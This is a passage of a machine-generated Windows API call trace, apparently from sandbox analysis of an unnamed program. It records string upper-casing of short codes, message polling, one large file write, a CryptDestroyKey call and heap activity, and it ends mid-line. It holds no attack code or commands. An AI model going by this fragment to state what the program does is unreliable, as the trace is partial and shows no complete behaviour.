[0087.629] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.629] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.629] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.629] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.629] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.629] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.629] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.629] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.629] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.630] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.630] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.630] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.630] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.630] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.630] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.644] WriteFile (in: hFile=0x294, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xe248, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xe248, lpOverlapped=0x0) returned 1 [0087.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.646] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.646] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0087.646] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.646] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0087.646] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.646] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.646] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.646] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.646] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.647] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.647] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0087.647] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9a60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.647] CryptDestroyKey (hKey=0x9a4280) returned 1 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.647] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.648] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.648] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.649] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0087.649] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.649] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0087.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.650] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0087.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0087.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.650] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0087.651] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0087.651] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0087.651] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.651] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0087.651] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.652] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0087.652] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0087.652] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.652] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0087.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.653] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.658] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b20 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74508 [0087.659] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d60 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9da8 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9d78 [0087.659] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 